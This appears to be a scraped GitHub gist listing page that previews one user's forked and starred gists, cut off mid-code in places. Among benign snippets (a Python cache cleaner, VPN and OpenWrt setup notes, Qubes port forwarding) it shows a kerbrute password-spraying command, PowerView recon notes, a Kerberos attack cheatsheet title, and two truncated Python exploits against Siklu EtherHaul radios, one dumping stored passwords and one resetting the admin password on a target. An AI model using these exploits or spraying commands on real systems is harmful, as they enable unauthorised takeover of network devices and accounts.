With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
xorr0@riseup.net xorr0
xorr0
/ siklu_etherhaul_showpw.py
Created
November 15, 2019 15:51
— forked from ianling/siklu_etherhaul_showpw.py
Siklu EtherHaul Show Password Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| from time import sleep | |
| address = '192.168.1.11' # the target | |
| port = 555 | |
| # set up binary strings to send to the radio | |
| root = bytearray(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xad\x00\x00\x00\x00\x72\x6f\x6f\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') | |
| moinfo = bytearray(b'\x6d\x6f\x2d\x69\x6e\x66\x6f\x20\x73\x79\x73\x74\x65\x6d\x20\x3b\x20\x6e\x74\x70\x20\x3b\x20\x69\x70\x20\x3b\x20\x69\x70\x76\x36\x20\x3b\x20\x65\x74\x68\x20\x3b\x20\x61\x61\x61\x2d\x73\x65\x72\x76\x65\x72\x20\x3b\x20\x61\x61\x61\x20\x3b\x20\x73\x6e\x6d\x70\x2d\x6d\x6e\x6 |
xorr0
/ siklu_etherhaul_setpw.py
Created
November 15, 2019 15:51
— forked from ianling/siklu_etherhaul_setpw.py
Siklu EtherHaul Set Password Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| from time import sleep | |
| #this sets the password to 'Abc123123' | |
| target = '1.2.3.4' | |
| admin = bytearray(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x39\x00\x00\x00\x00\x61\x64\x6d\x69\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') | |
| setpassword = bytearray(b'\x73\x69\x6d\x70\x6c\x65\x2d\x63\x6f\x6d\x6d\x61\x6e\x64\x20\x73\x65\x74\x20\x75\x73\x65\x72\x20\x61\x64\x6d\x69\x6e\x20\x74\x79\x70\x65\x20\x61\x64\x6d\x69\x6e\x20\x70\x61\x73\x73\x77\x20\x41\x62\x63\x31\x32\x33\x31\x32\x33\x00') #Abc123123 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # pyclean command to clear all python cache in a directory | |
| # source: https://stackoverflow.com/questions/28991015/python3-project-remove-pycache-folders-and-pyc-files | |
| # in .bash_profile / .bash_rc etc put: | |
| pyclean () { | |
| find . -type f -name '*.py[co]' -delete -o -type d -name __pycache__ -delete | |
| } | |
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| For other users who just want to download a file/folder from github, simply use: | |
| svn export <repo>/trunk/<folder> | |
| e.g. | |
| svn export https://github.com/lodash/lodash.com/trunk/docs | |
| (yes, that's svn here. apparently in 2016 you still need svn to simply download some github files) | |
| Courtesy: Download a single folder or directory from a GitHub repo |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @ECHO off | |
| rem.||( | |
| ** WINDOWS BATCH SCRIPT TO CONNECT TO RISEUP.NET VPN RED ** | |
| https://riseup.net/en/vpn/vpn-red | |
| - my win10 x64 system wouldn't grab an IPv4 address upon the initial connection, so I forced this script to release and renew it's IPv4 address once the VPN was activated | |
| - also, my system would loose routes every so often, so I have an infinite loop at the end of this script that constantly adds the proper riseup.net VPN routes every 5 minutes. | |
| - to determine which ROUTES need to be implemented, watch when openvpn-gui connects and you will see a section like this -- which is where the routes are configured; |
Joeviocoe
/ qvm-portfwd-iptables
Last active
June 16, 2021 11:40
— forked from daktak/qvm-exposeip.sh
Qubes-os port forwarding to allow external connections
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # Inspired by https://gist.github.com/daktak/f887352d564b54f9e529404cc0eb60d5 | |
| # Inspired by https://gist.github.com/jpouellet/d8cd0eb8589a5b9bf0c53a28fc530369 | |
| ip() { qvm-prefs -g -- "$1" ip; } | |
| netvm() { qvm-prefs -g -- "$1" netvm; } | |
| forward() { | |
| local from_domain=$1 | |
| local to_domain=$2 |
Misairu-G
/ [GUIDE] Optimus laptop dGPU passthrough.md
Last active
March 24, 2024 14:09
[GUIDE] Optimus laptop dGPU passthrough
braian87b
/ openwrt-lede-openvpn-client.md
Last active
April 2, 2021 09:33
Setting an OpenWrt / LEDE Based Router as OpenVPN Client
These instructions should work for Streisand as well for others VPN providers (Streisand is a Software that automatically configures a VPS online server with OpenVPN and other VPN/Proxy Softwares in order to have a private VPN Server)
These instructions are for getting an OpenWrt Based Router working as OpenVPN Client (should work for LEDE, Gargoyle and another distributions). Computers connected to Lan Ports of the OpenWrt Router will navigate through the Internet connection of the OpenVPN Server (in this case the Streisand one previously set up) you need a working Router with OpenWrt based firmware flashed on it (LEDE or eko.one.pl could also work) steps works well on Chaos Calmer 15.05 or 15.05.1.
- You need to
telnet 192.168.1.1(OpenWrt Router) and set up a password usingpasswdYou can skip this if you already have a password and can connect using ssh.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
NewerOlder